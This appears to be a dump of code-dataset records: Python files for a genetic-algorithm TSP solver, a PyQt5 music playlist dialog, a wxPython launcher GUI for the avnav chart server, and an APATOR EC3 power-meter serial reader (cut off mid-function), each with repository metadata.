    http://www.inf.tu-dresden.de/content/institutes/ki/cl/study/summer14/pssai/slides/GA_for_TSP.pdf

    :param first_parent: first parent's chromosome
    :param sec_parent: second parent's chromosome
    :param crossover_pt: points at which to perform the crossover
    :return: the resulting offspring.
    """
    reordered_sec_parent = np.roll(sec_parent, -crossover_pt[1])
    new_arr = first_parent[crossover_pt[0] : crossover_pt[1]]
    new_arr = np.append(new_arr, reordered_sec_parent)
    # Keep only the first occurrence of every city, preserving order of
    # appearance, then rotate the slice back to its original position.
    _, idx = np.unique(new_arr, return_index=True)
    # Removed leftover debugging no-op: `if res.shape[0] != 30: a = 1`
    # (a breakpoint anchor hard-coded to a 30-city instance).
    return np.roll(new_arr[np.sort(idx)], crossover_pt[0])
def mutate_population(self, population, n_mutations, **kwargs):
    """
    Mutates the population using the configured strategy (or a
    ``mutation_strategy`` keyword override, used by "select_any_mutation").
    It selects the rows on which mutation will be applied and delegates to
    the matching strategy implementation.

    :param population: the population at a given iteration
    :param n_mutations: number of mutations to be performed. This number is
        calculated according to mutation_rate, but is rescaled to one
        mutation per chromosome (rather than per gene) inside this function.
    :return: the mutated population
    """
    adjusted_n_mutations = np.ceil(n_mutations / self.n_genes).astype(int)
    if adjusted_n_mutations == 0:
        return population
    mutation_rows = self.get_mutation_rows(adjusted_n_mutations, population)
    mutation_strategy = kwargs.get("mutation_strategy", self.mutation_strategy)
    if mutation_strategy == "2-opt":
        return self.two_opt_mutation(population, mutation_rows)
    elif mutation_strategy == "random_swap":
        mutation_cols = self.get_mutation_cols(adjusted_n_mutations, population)
        return self.random_swap_mutation(population, mutation_rows, mutation_cols)
    elif mutation_strategy == "random_gene_around_nearest_neighbour":
        # NOTE(review): this name is not in `allowed_mutations`, so the
        # constructor rejects it; reachable only via the kwargs override.
        return self.random_gene_around_nearest_neighbour_mutation(
            population, mutation_rows
        )
    elif mutation_strategy == "random_gene_nearest_neighbour":
        return self.random_gene_nearest_neighbour_mutation(
            population, mutation_rows
        )
    elif mutation_strategy == "worst_gene_random":
        return self.worst_gene_random_mutation(population, mutation_rows)
    elif mutation_strategy == "worst_gene_nearest_neighbour":
        return self.worst_gene_nearest_neighbour_mutation(population, mutation_rows)
    elif mutation_strategy == "random_inversion":
        return self.random_inversion_mutation(
            population,
            mutation_rows,
            np.random.choice(int(population.shape[1] / 2), 1)[0],
        )
    elif mutation_strategy == "select_any_mutation":
        # random.sample() rejects sets on Python >= 3.11; sample from a
        # sorted sequence instead so the call stays valid and deterministic
        # per seed.
        selected_strategy = random.sample(sorted(mutation_options), 1)[0]
        return self.mutate_population(
            population, n_mutations, **{"mutation_strategy": selected_strategy}
        )
    else:
        raise (InvalidInput(f"{mutation_strategy} is an invalid mutation strategy"))
def find_worst_gene(self, chromosome):
    """
    Finds the index of the "worst" gene: the city whose two adjacent edges
    in the closed tour have the largest combined weight. The tour wraps
    around, so the first and last genes use the closing edge.

    :param chromosome: tour to inspect
    :return: index of the worst gene
    """
    n = len(chromosome)
    distances = []
    for i in range(n):
        prev_city = chromosome[i - 1]          # wraps to the last city at i == 0
        next_city = chromosome[(i + 1) % n]    # wraps to the first city at i == n-1
        distances.append(
            self.G.edges[(prev_city, chromosome[i])]["weight"]
            + self.G.edges[(chromosome[i], next_city)]["weight"]
        )
    return np.argmax(distances)
| 31.929577 | 104 | 0.638619 | 1,089 | 9,068 | 5.115702 | 0.232323 | 0.063184 | 0.01436 | 0.037695 | 0.282714 | 0.225992 | 0.184348 | 0.17986 | 0.156166 | 0.132831 | 0 | 0.010563 | 0.269188 | 9,068 | 283 | 105 | 32.042403 | 0.830089 | 0.177658 | 0 | 0.069182 | 0 | 0 | 0.106451 | 0.0209 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056604 | false | 0 | 0.075472 | 0 | 0.238994 | 0.012579 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44aee10963b90c303639a9d3405aa32659f7cfd5 | 12,188 | py | Python | src/component/PlaylistDialog.py | renchangjiu/kon-windows | a20f33fc98cd197e1e601b5d97adecabee9176d8 | [
"MIT"
] | 2 | 2020-06-01T00:34:50.000Z | 2020-12-08T14:40:41.000Z | src/component/PlaylistDialog.py | renchangjiu/kon-windows | a20f33fc98cd197e1e601b5d97adecabee9176d8 | [
"MIT"
] | null | null | null | src/component/PlaylistDialog.py | renchangjiu/kon-windows | a20f33fc98cd197e1e601b5d97adecabee9176d8 | [
"MIT"
] | null | null | null | from PyQt5 import QtGui
from PyQt5.QtCore import Qt, QEvent, QModelIndex
from PyQt5.QtGui import QPixmap, QColor, QIcon, QCursor, QPainter, QPen
from PyQt5.QtWidgets import QWidget, QTableWidgetItem, \
QAction, QMenu, QLabel, QWidgetAction, QHBoxLayout
from src.Apps import Apps
from src.model.MusicList import MusicList
from src.ui.PlaylistDialogUI import Ui_Form
from src.util import util
class PlayListDialog(QWidget, Ui_Form):
    """Popup dialog showing and controlling the player's current play queue."""

    def __init__(self, parent, ):
        QWidget.__init__(self)
        Ui_Form.__init__(self)
        self.setupUi(self)
        self.setParent(parent)
        # Shared application-level services and state.
        self.musicListService = Apps.musicListService
        self.player = Apps.player
        self.playlist = Apps.playlist
        # Style/widget setup must run before signal wiring.
        self.__init_ui()
        self.__init_table_widget_ui()
        self.__set_table_widget_width()
        self.__initConnect()
def __initConnect(self):
    """Wire model signals and table interactions to their handlers."""
    self.playlist.changed.connect(self.onPlaylistChanged)
    self.pushButton_2.clicked.connect(self.onClearBtnClicked)
    self.tableWidget.cellPressed.connect(self.open_music_list)
    self.tableWidget.doubleClicked.connect(self.onTableDoubleClicked)
    self.tableWidget.customContextMenuRequested.connect(self.onRightClick)
def onPlaylistChanged(self):
    """Rebuild the play-queue table after the playlist model changed.

    Repositions the dialog relative to its parent, refills one row per
    queued music (title, artist, link-to-playlist button, duration) and
    marks the currently playing row with a speaker icon.
    """
    playlist = self.playlist
    # Dock the dialog to the parent's right edge, below the 150px header.
    self.setGeometry(self.parent().width() - 580, 150, 580,
                     self.parent().height() - 150 - 48)
    self.tableWidget.clearContents()
    self.tableWidget.setRowCount(playlist.size())
    self.label.setText("共%d首" % playlist.size())
    icon = QIcon("./resource/image/链接.png")  # only used by the commented-out item variant
    for i in range(playlist.size()):
        # NOTE(review): self.btn_link is rebound each iteration, so after the
        # loop it refers only to the LAST row's label; eventFilter compares
        # against it — confirm that is intended.
        self.btn_link = QLabel(self.tableWidget)
        self.btn_link.setStyleSheet("background-color:rgba(0,0,0,0)")
        self.btn_link.setPixmap(QPixmap("./resource/image/链接.png"))
        self.btn_link.setAlignment(Qt.AlignCenter)
        self.btn_link.setCursor(Qt.PointingHandCursor)
        # self.btn_link.installEventFilter(self)
        # icon_item = QTableWidgetItem()
        # icon_item.setIcon(icon)
        music = playlist.get(i)
        self.tableWidget.setItem(i, 0, QTableWidgetItem("\t"))
        self.tableWidget.setItem(i, 1, QTableWidgetItem(music.title))
        self.tableWidget.setItem(i, 2, QTableWidgetItem(music.artist))
        # self.tableWidget.setItem(i, 3, icon_item)
        self.tableWidget.setCellWidget(i, 3, self.btn_link)
        self.tableWidget.setItem(i, 4, QTableWidgetItem(util.format_time(music.duration)))
    # Show a speaker icon on the row of the currently playing music.
    icon_label = QLabel()
    icon_label.setPixmap(QPixmap("./resource/image/musics_play.png"))
    icon_label.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
    icon_label.setCursor(Qt.PointingHandCursor)
    self.tableWidget.setCellWidget(playlist.getIndex(), 0, icon_label)
def onTableDoubleClicked(self, modelIndex: QModelIndex):
    """Play the double-clicked queue row: jump the playlist to it and select it."""
    index = modelIndex.row()
    self.playlist.setIndex(index)
    self.player.play(self.playlist.getCurrentMusic())
    self.tableWidget.selectRow(index)
def onClearBtnClicked(self):
    """Handle the clear button: empty the play queue and stop playback."""
    self.playlist.clear()
    self.player.stop()
def open_music_list(self, row, column):
    """Navigate to the playlist that the clicked row's music belongs to.

    Only reacts to clicks in column 3 (the link-button column); other
    columns are ignored.
    """
    # Clicking the link button jumps to the owning playlist's page.
    if column == 3:
        music = self.playlist.get(row)
        music_list = self.musicListService.get(music.mid)
        self.parent().navigation.setFocus()
        self.parent().navigation.setCurrentRow(2)
        # Names may collide, so match the navigation entry by playlist id.
        items = self.parent().navigation.findItems(music_list.name, Qt.MatchCaseSensitive)
        item = None
        for item_ in items:
            data = item_.data(Qt.UserRole)
            if music.mid == data.id:
                item = item_
                break
        if item is not None:
            data = item.data(Qt.UserRole)
            self.parent().navigation.setCurrentItem(item)
            self.parent().updateMusicList(data.id)
            # id 0 is the built-in "local music" page.
            if data.id == 0:
                self.parent().stackedWidget_2.setCurrentWidget(self.parent().local_music_page)
            # Any other id is a regular user playlist.
            else:
                self.parent().stackedWidget_2.setCurrentWidget(self.parent().music_list_detail)
            self.parent().show_musics_data()
            self.hide()
def onRightClick(self):
    """Build and show the context menu for the currently selected queue rows."""
    self.play_list_menu.clear()
    act1 = self.create_widget_action("./resource/image/nav-播放.png", "播放(Enter)")
    act2 = QAction("收藏到歌单(Ctrl+S)", self)
    act3 = self.create_widget_action("./resource/image/打开文件.png", "打开文件所在目录")
    act4 = self.create_widget_action("./resource/image/删除.png", "从列表中删除(Delete)")
    self.play_list_menu.addAction(act1)
    self.play_list_menu.addAction(act2)
    # Collect the selected row numbers (selectedItems yields every column).
    items = self.tableWidget.selectedItems()
    rows = set()
    for item in items:
        rows.add(item.row())
    musics = []
    for row in rows:
        music = self.playlist.get(row)
        musics.append(music)
    # "Open containing folder" only makes sense for a single selection.
    if len(rows) == 1:
        self.play_list_menu.addAction(act3)
    # Attach the "collect to playlist" submenu to act2.
    self.create_collect_menu(musics)
    act2.setMenu(self.collect_menu)
    self.play_list_menu.addMenu(self.collect_menu)
    self.play_list_menu.addSeparator()
    self.play_list_menu.addAction(act4)
    act1.triggered.connect(lambda: self.parent().on_act_play(musics))
    act3.triggered.connect(lambda: self.parent().on_act_open_file(musics))
    act4.triggered.connect(lambda: self.onActDel(musics))
    self.play_list_menu.exec(QCursor.pos())
def onActDel(self, musics: list):
    """Remove *musics* from the queue; advance playback if one was playing."""
    current = self.playlist.getCurrentMusic()
    was_playing = any(
        m.path == current.path and m.mid == current.mid for m in musics
    )
    for m in musics:
        self.playlist.remove(m)
    if was_playing:
        self.parent().nextMusic()
def create_collect_menu(self, musics: list):
    """Fill the 'collect to playlist' submenu with all user playlists."""
    self.collect_menu.clear()
    act0 = self.create_widget_action("./resource/image/添加歌单.png", "创建新歌单")
    self.collect_menu.addAction(act0)
    self.collect_menu.addSeparator()
    # Every playlist except the built-in default one.
    mls = list(filter(lambda ml: ml.id != MusicList.DEFAULT_ID, self.musicListService.list_(MusicList())))
    for music_list in mls:
        act = self.create_widget_action("./resource/image/歌单.png", music_list.name, music_list)
        self.collect_menu.addAction(act)
        # NOTE(review): every action connects to the same handler without
        # passing its playlist; presumably the handler recovers the target
        # from the triggered action's data — confirm.
        act.triggered.connect(lambda: self.parent().on_acts_choose(musics))
def __init_ui(self):
    """Apply frameless-window flags, widget styling, and build the context menus."""
    self.setWindowFlag(Qt.FramelessWindowHint)
    self.tabWidget.setCurrentWidget(self.play_list)
    self.tabWidget.tabBar().setCursor(Qt.PointingHandCursor)
    self.tabWidget.setStyleSheet("QTabWidget::pane{border-top: 1px solid #e1e1e2;}" +
                                 "QTabWidget::tab-bar{alignment:center;height:46px;}" +
                                 "QTabBar::tab{height:26px;width:128px;border-radius:4px;}" +
                                 "QTabBar::tab:selected{background-color:#7c7d86;color:#ffffff;}" +
                                 "QTabBar::tab:!selected{background-color:#ffffff;color:#888888;}" +
                                 "QTabBar::tab:!selected:hover{background:#f5f5f7;color:#666666;}"
                                 )
    self.widget.setStyleSheet(
        "background:#f9f9f9;border:none;border-bottom:1px solid #efefef;border-left:1px solid #c3c3c4;")
    self.label.setStyleSheet("border:none")
    self.label_2.setStyleSheet("border:none")
    self.widget_2.setStyleSheet(
        "background:#f9f9f9;border:none;border-bottom:1px solid #efefef;border-left:1px solid #c3c3c4;")
    self.pushButton.setStyleSheet("QPushButton{color:#666666;border:none;}QPushButton:hover{color:#444444;}")
    self.pushButton_2.setStyleSheet("QPushButton{color:#666666;border:none;}QPushButton:hover{color:#444444;}")
    self.pushButton.setCursor(Qt.PointingHandCursor)
    self.pushButton_2.setCursor(Qt.PointingHandCursor)
    # Right-click context menu of the play queue.
    self.play_list_menu = QMenu()
    # Second-level menu shown when hovering "collect to playlist".
    self.collect_menu = QMenu()
    self.play_list_menu.setStyleSheet(
        "QMenu{background-color:#fafafc;border:1px solid #c8c8c8;font-size:13px;width:214px;}" +
        "QMenu::item {height:36px;padding-left:44px;padding-right:60px;}" +
        "QMenu::item:selected {background-color:#ededef;}" +
        "QMenu::separator{background-color:#ededef;height:1px}")
    self.collect_menu.setStyleSheet(
        "QMenu{background-color:#fafafc;border:1px solid #c8c8c8;font-size:13px;width:214px;}" +
        "QMenu::item {height:36px;padding-left:44px;padding-right:60px;}" +
        "QMenu::item:selected {background-color:#ededef;}" +
        "QMenu::separator{background-color:#ededef;height:1px}")
def __init_table_widget_ui(self):
    """Configure the queue table: five columns, hidden header, flat styling."""
    self.tableWidget.setColumnCount(5)
    # Header labels (hidden below): marker, title, artist, album, duration.
    self.tableWidget.setHorizontalHeaderLabels(["", "音乐标题", "歌手", "专辑", "时长"])
    self.tableWidget.horizontalHeader().setHidden(True)
    self.tableWidget.setStyleSheet("QTableWidget{border:none;border-left:1px solid #c0c0c1;background:#fafafa;}" +
                                   "QTableWidget::item::selected{background-color:#e3e3e5}")
def __set_table_widget_width(self):
    """Distribute the dialog width over the five table columns by fixed ratios."""
    total = self.width()
    for column, ratio in enumerate((0.03, 0.63, 0.17, 0.05, 0.12)):
        self.tableWidget.setColumnWidth(column, total * ratio)
def create_widget_action(self, icon, text, data=None):
    """Build a QWidgetAction rendering an icon + text row (used in the menus).

    :param icon: image path for the leading icon, or "" for no icon
    :param text: label text; also stored as the action's text
    :param data: optional payload attached to the action
    :return: the configured QWidgetAction
    """
    act = QWidgetAction(self)
    act.setText(text)
    if data is not None:
        act.setData(data)
    widget = QWidget(self)
    layout = QHBoxLayout()
    layout.setContentsMargins(13, -1, -1, 11)
    layout.setSpacing(13)
    lb_icon = QLabel(widget)
    lb_icon.resize(18, 18)
    lb_text = QLabel(text, widget)
    if icon != "":
        lb_icon.setPixmap(QPixmap(icon))
    widget.setStyleSheet("QWidget:hover{background:#ededef} QWidget{color:#000000;font-size:13px;}")
    layout.addWidget(lb_icon)
    layout.addWidget(lb_text)
    layout.addStretch()
    widget.setLayout(layout)
    act.setDefaultWidget(widget)
    return act
def eventFilter(self, QObject, QEvent_):
    """Qt event-filter hook; effectively a no-op placeholder.

    NOTE(review): self.btn_link refers only to the LAST row's label (see
    onPlaylistChanged), and the installEventFilter call is commented out
    there — this path looks dead; confirm before relying on it.
    """
    if self.btn_link == QObject:
        if QEvent_.type() == QEvent.MouseButtonPress:
            item = self.tableWidget.currentItem()
            if item is not None:
                pass
    return super().eventFilter(QObject, QEvent_)
def paintEvent(self, QPaintEvent):
    """Custom painting: border lines plus the tab-bar background fill."""
    # Draw the outer border lines (top edge and left edge of the tab bar).
    paint = QPainter()
    paint.begin(self)
    pen = QPen()
    pen.setColor(QColor("#c3c3c4"))
    paint.setPen(pen)
    paint.drawLine(0, 0, self.width(), 0)
    paint.drawLine(0, 0, 0, self.tabWidget.tabBar().height())
    # Fill the header (tab-bar) background.
    brush = QtGui.QBrush(QColor("#f4f4f6"))
    brush.setStyle(Qt.SolidPattern)
    paint.setBrush(brush)
    paint.drawRect(0, 0, self.width(), self.tabWidget.tabBar().height())
| 44.808824 | 118 | 0.628159 | 1,318 | 12,188 | 5.694234 | 0.254932 | 0.063957 | 0.017588 | 0.021319 | 0.214657 | 0.164823 | 0.136975 | 0.10553 | 0.10553 | 0.10553 | 0 | 0.025868 | 0.248277 | 12,188 | 271 | 119 | 44.97417 | 0.793277 | 0.065967 | 0 | 0.074074 | 0 | 0.018519 | 0.149894 | 0.1276 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069444 | false | 0.00463 | 0.037037 | 0 | 0.12037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44b09eface0e025db8dfa1c9489702d2607f4f1d | 8,486 | py | Python | linux/avnav_gui.py | e-sailing/avnav | b3e8df4d6fa122b05309eee09197c716e29b64ec | [
"MIT"
] | null | null | null | linux/avnav_gui.py | e-sailing/avnav | b3e8df4d6fa122b05309eee09197c716e29b64ec | [
"MIT"
] | null | null | null | linux/avnav_gui.py | e-sailing/avnav | b3e8df4d6fa122b05309eee09197c716e29b64ec | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ts=2 sw=2 et ai
###############################################################################
# Copyright (c) 2012,2014 Andreas Vogel andreas@wellenvogel.net
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
###############################################################################
import optparse
import sys
import os
import wx
from avnav_gui_design import *
# Fallback version string; replaced by the generated version module when present.
AVNAV_VERSION="development"
try:
    from avnav_gui_version import AVNAV_VERSION
except:
    pass
import subprocess
import re

__author__ = 'andreas'
class AvnavGui(Avnav):
    """Main window: launches/stops the avnav server and the chart converter."""

    def __init__(self, *args, **kwds):
        Avnav.__init__(self, *args, **kwds)
        # Default output directory for converted charts and the log file.
        self.defaultOut=os.path.join(os.path.expanduser("~"),"AvNavCharts")
        self.serverbase=os.path.join(os.path.expanduser("~"),"avnav")
        self.txLogfile.SetValue(os.path.join(self.defaultOut,"avnav-chartconvert.log"))
        self.outputDir.SetValue(self.defaultOut)
        # Child-process handles and GUI state flags.
        self.server=None
        self.serverRunning=False
        self.converter=None
        # Poll child-process state twice per second.
        self.timer=wx.Timer(self,1)
        self.Bind(wx.EVT_TIMER, self.OnTimer)
        self.timer.Start(500)
        self.urlmap=None
        self.SetTitle("Avnav - %s"%(AVNAV_VERSION))
        pass
def setServerBase(self, base):
    """Set the base directory passed to the avnav server."""
    self.serverbase=base
def setUrlMap(self, base):
    """Set the optional url map handed to the server via -u."""
    self.urlmap = base
def btExitClicked(self, event):
    """Exit button: stop both child processes, then close the window."""
    self.terminateServer()
    self.terminateConverter()
    self.Close(True)
def getBaseDir(self):
    """Return the directory containing this script (symlinks resolved)."""
    return os.path.dirname(os.path.realpath(__file__))
def doStartServer(self):
    """Launch avnav_server.py in a held xterm unless it is already running."""
    if self.checkServerRunning():
        return
    script=os.path.join(self.getBaseDir(),"..","server","avnav_server.py")
    # -hold keeps the xterm open so server output stays visible.
    args=["xterm","-hold","-e",sys.executable,script,"-c",os.path.join(self.outputDir.GetValue(),"out")]
    if self.urlmap is not None:
        args.append("-u")
        args.append(self.urlmap)
    args.append("-w")
    args.append(self.serverbase)
    args.append(os.path.join(self.serverbase,"avnav_server.xml"))
    self.server=subprocess.Popen(args,cwd=self.getBaseDir())
    # Immediately reflect the new process state in the GUI.
    self.checkServerRunning()
def terminateServer(self):
    """Best-effort termination of a previously launched server process."""
    if self.server is None:
        return
    try:
        self.server.terminate()
    except:
        pass
def checkServerRunning(self):
    """Poll the server child process and sync the GUI state.

    Returns True while the process is alive; otherwise resets the pid
    label and the start/stop button to the stopped state and returns False.
    """
    if self.server is not None:
        try:
            if self.server.poll() is None:
                # Still running: flip the GUI to "running" exactly once.
                if not self.serverRunning:
                    self.serverPid.SetLabel(str(self.server.pid))
                    self.serverPid.SetForegroundColour(wx.Colour(0,255, 0))
                    self.btStartServer.SetLabel("Stop Server")
                    self.serverRunning=True
                return True
        except:
            # Polling failed — try to kill the process, then fall through.
            try:
                self.server.terminate()
            except:
                pass
    # Seems to be not running: flip the GUI to "stopped" exactly once.
    if self.serverRunning:
        self.serverPid.SetLabel("server stopped")
        self.serverPid.SetForegroundColour(wx.Colour(255,0, 0))
        self.btStartServer.SetLabel("Start Server")
        self.serverRunning=False
    return False
def checkConverterRunning(self):
    """Poll the converter child process; handle its end-of-life once.

    Returns True while the converter is alive. When it has just finished,
    optionally starts the server (per the checkbox) and resets the start
    button; on polling errors the process is terminated best-effort.
    """
    if self.converter is not None:
        try:
            if self.converter.poll() is None:
                return True
            # We stopped: optionally chain-start the server.
            if self.startServer.IsChecked():
                self.doStartServer()
            self.btStart.SetLabel("Start")
        except:
            self.btStart.SetLabel("Start")
            try:
                self.converter.terminate()
            except:
                pass
        self.converter=None
    return False
def terminateConverter(self):
    """Stop the converter process if it is still running (best effort)."""
    if not self.checkConverterRunning():
        return
    try:
        self.converter.terminate()
    except:
        pass
def btStartServerClicked(self, event):
    """Toggle the server: start it when stopped, otherwise stop it."""
    if not self.serverRunning:
        self.doStartServer()
        return
    self.terminateServer()
    self.checkServerRunning()
def OnTimer(self,evt):
    """Periodic (500 ms) poll of both child processes to keep the GUI in sync."""
    self.checkServerRunning()
    self.checkConverterRunning()
def btSelectInputClicked(self, event):
    """Let the user pick chart input files and append them to the input list."""
    openFileDialog = wx.FileDialog(self, "Select Chart files or directories", "", "",
                                   "all (*.*)|*.*", wx.FD_OPEN | wx.FD_FILE_MUST_EXIST|wx.FD_MULTIPLE)
    if openFileDialog.ShowModal() == wx.ID_CANCEL:
        return  # the user changed idea...
    filenames=openFileDialog.GetPaths()
    # One selected path per line in the text control.
    for name in filenames:
        self.inputFiles.AppendText("\n"+name)
def btEmptyClicked(self, event):
    """Clear the list of selected input files."""
    self.inputFiles.Clear()
def btStartClicked(self, event):
    """Start the chart converter with the selected files, or stop it.

    Acts as a toggle: a running conversion is terminated. Otherwise the
    selected files are validated and read_charts.py is launched in a held
    xterm; the button label switches to "Stop".
    """
    if self.checkConverterRunning():
        self.terminateConverter()
        return
    selectedFiles = [f for f in re.split("\n", self.inputFiles.GetValue()) if f != ""]
    if len(selectedFiles) < 1:
        wx.MessageBox("no files selected")
        return
    # Only pass a logfile option when logging is enabled. The original code
    # had a dead `if ...IsChecked(): pass` and then unconditionally
    # overwrote the empty default, so the checkbox had no effect.
    log = []
    if self.cbLogfile.IsChecked():
        log = ["-e", self.txLogfile.GetValue()]
    args = ["xterm", "-T", "Avnav Chartconvert", "-hold", "-e",
            os.path.join(self.getBaseDir(), "..", "chartconvert", "read_charts.py")] \
        + log + ["-b", self.outputDir.GetValue()]
    if self.cbNewGemf.IsChecked():
        args.append("-g")
    if self.updateMode.IsChecked():
        args.append("-f")
    args.extend(selectedFiles)
    self.converter = subprocess.Popen(args, cwd=self.getBaseDir())
    self.btStart.SetLabel("Stop")
    self.checkConverterRunning()
def btOutDefaultClicked(self, event):
    """Reset the output directory to its default (~/AvNavCharts)."""
    self.outputDir.SetValue(self.defaultOut)
def btSelectOutClicked(self, event):
    """Let the user pick the chart output directory."""
    openFileDialog = wx.DirDialog(self, "Select Output Dir", style=1,defaultPath=self.defaultOut)
    if openFileDialog.ShowModal() == wx.ID_CANCEL:
        return  # the user changed idea...
    self.outputDir.SetValue(openFileDialog.GetPath())
def btLogfileClicked(self, event):
    """Let the user pick the converter logfile path."""
    openFileDialog = wx.FileDialog(self, "Select Logfile", style=1,defaultFile=self.txLogfile.GetValue())
    if openFileDialog.ShowModal() == wx.ID_CANCEL:
        return  # the user changed idea...
    self.txLogfile.SetValue(openFileDialog.GetPath())
if __name__ == "__main__":
    # wx.PySimpleApp was deprecated and removed in wxPython Phoenix (4.x);
    # wx.App(False) is the compatible replacement on both generations.
    app = wx.App(False)
    argv = sys.argv
    usage = "usage: %s [-b basedir] [-v viewerbase] " % (argv[0])
    parser = optparse.OptionParser(
        usage=usage,
        version="1.0",
        description='avnav_gui')
    parser.add_option("-b", "--basedir", dest="basedir", help="set the basedir for the server")
    parser.add_option("-u", "--urlmap", dest="urlmap", help="set some urlmap for the server")
    (options, args) = parser.parse_args(argv[1:])
    frame_1 = AvnavGui(None, -1, "")
    if options.basedir is not None:
        frame_1.setServerBase(options.basedir)
    if options.urlmap is not None:
        frame_1.setUrlMap(options.urlmap)
    app.SetTopWindow(frame_1)
    frame_1.Show()
    app.MainLoop()
| 36.895652 | 168 | 0.600283 | 929 | 8,486 | 5.427341 | 0.307858 | 0.01785 | 0.015867 | 0.013883 | 0.180087 | 0.12257 | 0.081515 | 0.047798 | 0.036692 | 0.036692 | 0 | 0.006312 | 0.27186 | 8,486 | 229 | 169 | 37.056769 | 0.809678 | 0.154018 | 0 | 0.359551 | 0 | 0 | 0.071234 | 0.003147 | 0 | 0 | 0 | 0 | 0 | 1 | 0.101124 | false | 0.039326 | 0.044944 | 0 | 0.219101 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44b155e14a6c99695a7fb8ef157cc096fe1beb35 | 8,162 | py | Python | powermeterapatorec3.py | grillbaer/data-logger | f0d5b878e8f4a2f8eafcc8453d8f3b42c210558d | [
"Apache-2.0"
] | 9 | 2018-03-11T20:46:31.000Z | 2022-03-28T13:28:43.000Z | powermeterapatorec3.py | grillbaer/data-logger | f0d5b878e8f4a2f8eafcc8453d8f3b42c210558d | [
"Apache-2.0"
] | null | null | null | powermeterapatorec3.py | grillbaer/data-logger | f0d5b878e8f4a2f8eafcc8453d8f3b42c210558d | [
"Apache-2.0"
] | 1 | 2020-05-03T07:15:08.000Z | 2020-05-03T07:15:08.000Z | """
Communication with APATOR EC3 power meter to get its actual readings.
"""
from __future__ import annotations
__author__ = 'Holger Fleischmann'
__copyright__ = 'Copyright 2021, Holger Fleischmann, Bavaria/Germany'
__license__ = 'Apache License 2.0'
import logging
import time
from typing import NamedTuple, Optional, Callable, List
import serial
from serial import SEVENBITS, PARITY_EVEN, SerialException
from utils import RepeatTimer
logger = logging.getLogger().getChild(__name__)
class PowerMeterReading(NamedTuple):
    """One set of meter register values; all values are None on failure."""
    success: bool                              # False when serial communication failed
    consumption_total_sum_kwh: Optional[float] # high + low tariff sum (kWh)
    consumption_high_sum_kwh: Optional[float]  # OBIS 1.8.1 register (kWh)
    consumption_low_sum_kwh: Optional[float]   # OBIS 1.8.2 register (kWh)
class PowerMeterApatorEC3:
    """
    Communication object to get readings from an APATOR EC3 electrical power meter.
    Tested only with a 12EC3 two tariff version to get the readings for 1.8.1 and 1.8.2 OBIS values.
    Unfortunately, this meter does not provide any actual effective power values.

    Uses serial communication with the front IR interface.
    Sends a request to the power meter and reads it's response, i.e. a bidirectional
    TX/RX infrared interface must be connected to the serial port.

    Communication needs quite long timeouts and delays because the meter is reaaaaally slow.
    """

    serial_port: str                  # device name, e.g. "COM5" or "/dev/serialUSB0"
    _serial: Optional[serial.Serial]  # open port handle, or None while closed

    def __init__(self, serial_port: str):
        """
        Create new communication object for power meter.
        Does not yet open the serial port.
        :param serial_port: serial port to use, e.g. "COM5" on Windows or "/dev/serialUSB0" on Linux
        """
        self.serial_port = serial_port
        self._serial = None
def open(self) -> None:
    """
    Open the serial port if not open yet. Don't forget to close it when not needed any more.
    :raises: serial.serialutil.SerialException
    """
    if self._serial is not None:
        return
    logger.info("Opening serial port " + self.serial_port)
    # 300 baud, 7E1 — the meter's IR interface settings.
    self._serial = serial.Serial(
        self.serial_port,
        baudrate=300,
        bytesize=SEVENBITS,
        parity=PARITY_EVEN,
        timeout=10,
    )
def close(self) -> None:
    """
    Close the serial port if open.
    """
    if self._serial is None:
        return
    logger.info("Closing serial port " + self.serial_port)
    self._serial.close()
    self._serial = None
def read_raw(self) -> str:
    """
    Read the raw response from the power meter.
    :return: raw response string
    :raises: serial.serialutil.SerialException if communication failed
    """
    logger.debug("Sending request on serial port ...")
    # Sign-on request (presumably IEC 62056-21 mode C — confirm against
    # the meter's manual).
    request = b'/?!\r\n'
    self._serial.write(request)
    self._serial.flush()
    # The meter is very slow; give it time before acknowledging.
    time.sleep(2)
    # ACK + option "000": request the data readout.
    ack_output = b'\x06000\r\n'
    self._serial.write(ack_output)
    self._serial.flush()
    time.sleep(2)
    logger.debug("Reading response from serial port ...")
    data = self._serial.read(65536)
    if len(data) > 0:
        logger.debug("Response:\n" + data.decode("ascii"))
